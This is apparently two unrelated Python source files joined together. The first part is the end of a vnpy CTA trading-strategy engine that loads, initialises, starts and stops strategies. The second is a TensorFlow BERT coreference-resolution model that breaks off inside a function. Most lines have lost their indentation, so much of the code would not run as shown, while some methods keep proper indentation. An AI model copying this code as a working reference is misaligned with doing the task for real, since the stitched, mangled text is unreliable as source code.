bars = database_manager.load_bar_data(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end,
)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
    def add_strategy(
        self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
    ):
        """
        Add a new strategy instance.

        Fails with a log message (no exception) when the name is already
        taken or the strategy class has not been loaded.
        """
        if strategy_name in self.strategies:
            self.write_log(f"创建策略失败,存在重名{strategy_name}")
            return
        strategy_class = self.classes.get(class_name, None)
        if not strategy_class:
            self.write_log(f"创建策略失败,找不到策略类{class_name}")
            return
        strategy = strategy_class(self, strategy_name, vt_symbol, setting)
        self.strategies[strategy_name] = strategy
        # Add vt_symbol to strategy map.
        strategies = self.symbol_strategy_map[vt_symbol]
        strategies.append(strategy)
        # Update to setting file.
        self.update_strategy_setting(strategy_name, setting)
        self.put_strategy_event(strategy)
    def init_strategy(self, strategy_name: str):
        """
        Queue a strategy for asynchronous initialization.

        A single worker thread (_init_strategy) drains the queue; a new
        worker is started only when none is active.
        """
        self.init_queue.put(strategy_name)
        if not self.init_thread:
            # NOTE(review): check-then-start is not atomic; assumes this
            # method is only called from one thread — confirm with callers.
            self.init_thread = Thread(target=self._init_strategy)
            self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
self.load_strategy_class_from_external('QAMagicTrade')
def load_strategy_class_from_external(self,module_name: str = "" ):
"""
load strategy class from external module
"""
try:
module = importlib.import_module(module_name)
module_strategy_list = module.vnpy_get_strategylist()
for value in module_strategy_list:
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}外部加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
independent.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
from pytorch_to_tf import load_from_pytorch_checkpoint
class CorefModel(object):
  def __init__(self, config):
    """
    Build the coreference-resolution graph: a padding FIFO input queue,
    a BERT encoder initialized from a TF or PyTorch checkpoint, and a
    custom training op.

    Args:
      config: mapping of experiment settings; keys used here include
        max_segment_len, max_span_width, genres, bert_config_file,
        vocab_file, tf_checkpoint, init_checkpoint, num_docs, num_epochs
        and the optimizer hyperparameters.
    """
    self.config = config
    self.max_segment_len = config['max_segment_len']
    self.max_span_width = config["max_span_width"]
    # Genre string -> integer id used for the genre embedding lookup.
    self.genres = { g:i for i,g in enumerate(config["genres"]) }
    self.subtoken_maps = {}
    self.gold = {}
    self.eval_data = None # Load eval data lazily.
    self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
    self.tokenizer = tokenization.FullTokenizer(
        vocab_file=config['vocab_file'], do_lower_case=False)
    # One (dtype, shape) spec per tensor fed through the input queue.
    input_props = []
    input_props.append((tf.int32, [None, None])) # input_ids.
    input_props.append((tf.int32, [None, None])) # input_mask
    input_props.append((tf.int32, [None])) # Text lengths.
    input_props.append((tf.int32, [None, None])) # Speaker IDs.
    input_props.append((tf.int32, [])) # Genre.
    input_props.append((tf.bool, [])) # Is training.
    input_props.append((tf.int32, [None])) # Gold starts.
    input_props.append((tf.int32, [None])) # Gold ends.
    input_props.append((tf.int32, [None])) # Cluster ids.
    input_props.append((tf.int32, [None])) # Sentence Map
    self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
    dtypes, shapes = zip(*input_props)
    queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
    self.enqueue_op = queue.enqueue(self.queue_input_tensors)
    self.input_tensors = queue.dequeue()
    self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
    # bert stuff
    tvars = tf.trainable_variables()
    # If you're using TF weights only, tf_checkpoint and init_checkpoint can be the same
    # Get the assignment map from the tensorflow checkpoint. Depending on the extension, use TF/Pytorch to load weights.
    assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['tf_checkpoint'])
    init_from_checkpoint = tf.train.init_from_checkpoint if config['init_checkpoint'].endswith('ckpt') else load_from_pytorch_checkpoint
    init_from_checkpoint(config['init_checkpoint'], assignment_map)
    print("**** Trainable Variables ****")
    for var in tvars:
      init_string = ""
      if var.name in initialized_variable_names:
        init_string = ", *INIT_FROM_CKPT*"
      # tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
      # init_string)
      print(" name = %s, shape = %s%s" % (var.name, var.shape, init_string))
    num_train_steps = int(
        self.config['num_docs'] * self.config['num_epochs'])
    # Warm up the learning rate over the first 10% of training steps.
    num_warmup_steps = int(num_train_steps * 0.1)
    self.global_step = tf.train.get_or_create_global_step()
    self.train_op = optimization.create_custom_optimizer(tvars,
                      self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
                      num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1,
                      task_opt=self.config['task_optimizer'], eps=config['adam_eps'])
  def start_enqueue_thread(self, session):
    """
    Start a daemon thread that endlessly shuffles the training examples
    and feeds tensorized examples into the padding FIFO queue.
    """
    with open(self.config["train_path"]) as f:
      train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
    def _enqueue_loop():
      while True:
        random.shuffle(train_examples)
        if self.config['single_example']:
          # One (possibly truncated) tensorized example per document.
          for example in train_examples:
            tensorized_example = self.tensorize_example(example, is_training=True)
            feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
            session.run(self.enqueue_op, feed_dict=feed_dict)
        else:
          # Long documents may expand into several truncated windows;
          # flatten them all and shuffle at window level instead.
          examples = []
          for example in train_examples:
            tensorized = self.tensorize_example(example, is_training=True)
            if type(tensorized) is not list:
              tensorized = [tensorized]
            examples += tensorized
          random.shuffle(examples)
          print('num examples', len(examples))
          for example in examples:
            feed_dict = dict(zip(self.queue_input_tensors, example))
            session.run(self.enqueue_op, feed_dict=feed_dict)
    enqueue_thread = threading.Thread(target=_enqueue_loop)
    enqueue_thread.daemon = True
    enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
  def tensorize_example(self, example, is_training):
    """
    Convert one jsonlines example into the tuple of tensors fed through
    the input queue. During training, over-long documents are truncated
    (one window, or a list of windows when single_example is False).
    """
    clusters = example["clusters"]
    gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
    gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
    # cluster_ids[i] is 1-based so that 0 can mean "not a gold mention".
    cluster_ids = np.zeros(len(gold_mentions))
    for cluster_id, cluster in enumerate(clusters):
      for mention in cluster:
        cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
    sentences = example["sentences"]
    num_words = sum(len(s) for s in sentences)
    speakers = example["speakers"]
    # assert num_words == len(speakers), (num_words, len(speakers))
    speaker_dict = self.get_speaker_dict(util.flatten(speakers))
    sentence_map = example['sentence_map']
    max_sentence_length = self.max_segment_len
    text_len = np.array([len(s) for s in sentences])
    # Pad every segment to max_sentence_length (mask marks real tokens).
    input_ids, input_mask, speaker_ids = [], [], []
    for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
      sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
      sent_input_mask = [1] * len(sent_input_ids)
      # Speakers beyond the capped dict fall back to id 3.
      sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
      while len(sent_input_ids) < max_sentence_length:
        sent_input_ids.append(0)
        sent_input_mask.append(0)
        sent_speaker_ids.append(0)
      input_ids.append(sent_input_ids)
      speaker_ids.append(sent_speaker_ids)
      input_mask.append(sent_input_mask)
    input_ids = np.array(input_ids)
    input_mask = np.array(input_mask)
    speaker_ids = np.array(speaker_ids)
    assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
    doc_key = example["doc_key"]
    self.subtoken_maps[doc_key] = example.get("subtoken_map", None)
    self.gold[doc_key] = example["clusters"]
    # Genre id from the 2-letter doc-key prefix (0 when unknown).
    genre = self.genres.get(doc_key[:2], 0)
    gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
    example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
    if is_training and len(sentences) > self.config["max_training_sentences"]:
      if self.config['single_example']:
        return self.truncate_example(*example_tensors)
      else:
        # Non-overlapping windows, one per max_training_sentences stride.
        offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
        tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
        return tensor_list
    else:
      return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
  def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
    """
    For each of the k top spans, keep the c highest-scoring candidate
    antecedents under the cheap (coarse) scoring model.
    """
    k = util.shape(top_span_emb, 0)
    top_span_range = tf.range(k) # [k]
    antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
    # Valid antecedents strictly precede the mention.
    antecedents_mask = antecedent_offsets >= 1 # [k, k]
    fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
    # log(0) = -inf zeroes out invalid pairs under the later softmax.
    fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
    fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
    if self.config['use_prior']:
      antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, k]
      distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
      antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, k]
      fast_antecedent_scores += antecedent_distance_scores
    _, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
    top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
    top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
    top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
    return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
  def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
    """
    Build the full coref model: BERT encoding, candidate span enumeration
    and scoring, coarse-to-fine antecedent pruning, optional higher-order
    refinement, and the marginal log-likelihood loss.

    Returns ([candidate_starts, candidate_ends, candidate_mention_scores,
    top_span_starts, top_span_ends, top_antecedents,
    top_antecedent_scores], loss).
    """
    model = modeling.BertModel(
      config=self.bert_config,
      is_training=is_training,
      input_ids=input_ids,
      input_mask=input_mask,
      use_one_hot_embeddings=False,
      scope='bert')
    all_encoder_layers = model.get_all_encoder_layers()
    mention_doc = model.get_sequence_output()
    self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
    num_sentences = tf.shape(mention_doc)[0]
    max_sentence_length = tf.shape(mention_doc)[1]
    # Flatten padded segments into one [num_words, emb] document tensor.
    mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
    num_words = util.shape(mention_doc, 0)
    antecedent_doc = mention_doc
    flattened_sentence_indices = sentence_map
    # Enumerate all spans up to max_span_width starting at every word.
    candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
    candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
    candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
    candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
    # Drop spans that run off the document or cross a sentence boundary.
    candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
    flattened_candidate_mask = tf.reshape(candidate_mask, [-1]) # [num_words * max_span_width]
    candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask) # [num_candidates]
    candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask) # [num_candidates]
    candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]), flattened_candidate_mask) # [num_candidates]
    candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
    candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
    candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
    candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
    # beam size (capped at 3900 spans)
    k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
    c = tf.minimum(self.config["max_top_antecedents"], k)
    # pull from beam
    top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
                                               tf.expand_dims(candidate_starts, 0),
                                               tf.expand_dims(candidate_ends, 0),
                                               tf.expand_dims(k, 0),
                                               num_words,
                                               True) # [1, k]
    top_span_indices.set_shape([1, None])
    top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
    top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
    top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
    top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
    top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
    top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
    genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), genre) # [emb]
    if self.config['use_metadata']:
      speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
      top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
    else:
      top_span_speaker_ids = None
    # Dummy column represents the "no antecedent" decision.
    dummy_scores = tf.zeros([k, 1]) # [k, 1]
    top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
    # Segment index of each mention, used for the segment-distance feature.
    num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
    word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
    flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
    mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
    antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
    segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
    if self.config['fine_grained']:
      # Higher-order refinement: iteratively re-represent each span as a
      # gated mix of itself and its attended antecedents.
      for i in range(self.config["coref_depth"]):
        with tf.variable_scope("coref_layer", reuse=(i > 0)):
          top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
          top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
          top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
          top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
          attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
          with tf.variable_scope("f"):
            f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
            top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
    else:
      top_antecedent_scores = top_fast_antecedent_scores
    top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
    # Gold labels: a pair is positive when both spans are gold mentions in
    # the same cluster; masked pairs get cluster id -inf -> never positive.
    top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
    top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
    same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
    non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
    pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
    dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
    top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
    loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
    loss = tf.reduce_sum(loss) # []
    return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
    """Build a fixed-size embedding for each candidate span.

    Concatenates, per span: the start-token vector, the end-token vector,
    an optional learned span-width embedding, and an optional
    attention-weighted head representation.

    Args:
        head_emb: token-level embeddings. NOTE(review): unused in this
            body — head attention reads context_outputs; confirm this is
            intentional.
        context_outputs: [num_words, emb] contextualized token vectors.
        span_starts: [k] int indices of span starts.
        span_ends: [k] int indices of span ends (inclusive).

    Returns:
        [k, emb'] concatenated span embeddings.
    """
    span_emb_list = []

    span_start_emb = tf.gather(context_outputs, span_starts)  # [k, emb]
    span_emb_list.append(span_start_emb)

    span_end_emb = tf.gather(context_outputs, span_ends)  # [k, emb]
    span_emb_list.append(span_end_emb)

    span_width = 1 + span_ends - span_starts  # [k]

    if self.config["use_features"]:
        # Learned embedding of the span's width (1..max_span_width).
        span_width_index = span_width - 1  # [k]
        span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), span_width_index)  # [k, emb]
        span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
        span_emb_list.append(span_width_emb)

    if self.config["model_heads"]:
        # Soft head: attention over the tokens inside each span.
        mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
        head_attn_reps = tf.matmul(mention_word_scores, context_outputs)  # [K, T]
        span_emb_list.append(head_attn_reps)

    span_emb = tf.concat(span_emb_list, 1)  # [k, emb]
    return span_emb  # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
    """Score each candidate span as a mention.

    A feed-forward network over the span embedding, optionally adjusted
    by a learned width prior (a second FFNN scored over width embeddings
    and gathered per span).

    Returns:
        [k, 1] mention scores.
    """
    with tf.variable_scope("mention_scores"):
        span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout)  # [k, 1]
    if self.config['use_prior']:
        span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02))  # [W, emb]
        span_width_index = span_ends - span_starts  # [NC]
        with tf.variable_scope("width_scores"):
            # Score every possible width once, then gather per span.
            width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout)  # [W, 1]
        width_scores = tf.gather(width_scores, span_width_index)
        span_scores += width_scores
    return span_scores
def get_width_scores(self, doc, starts, ends):
    """Dot-product score between each span's start token and a learned
    width embedding indexed by the span's (end - start) distance.

    Returns:
        [k] scores (one per span).
    """
    distance = ends - starts
    span_start_emb = tf.gather(doc, starts)
    hidden = util.shape(doc, 1)
    with tf.variable_scope('span_width'):
        span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance)  # [W, emb]
    scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
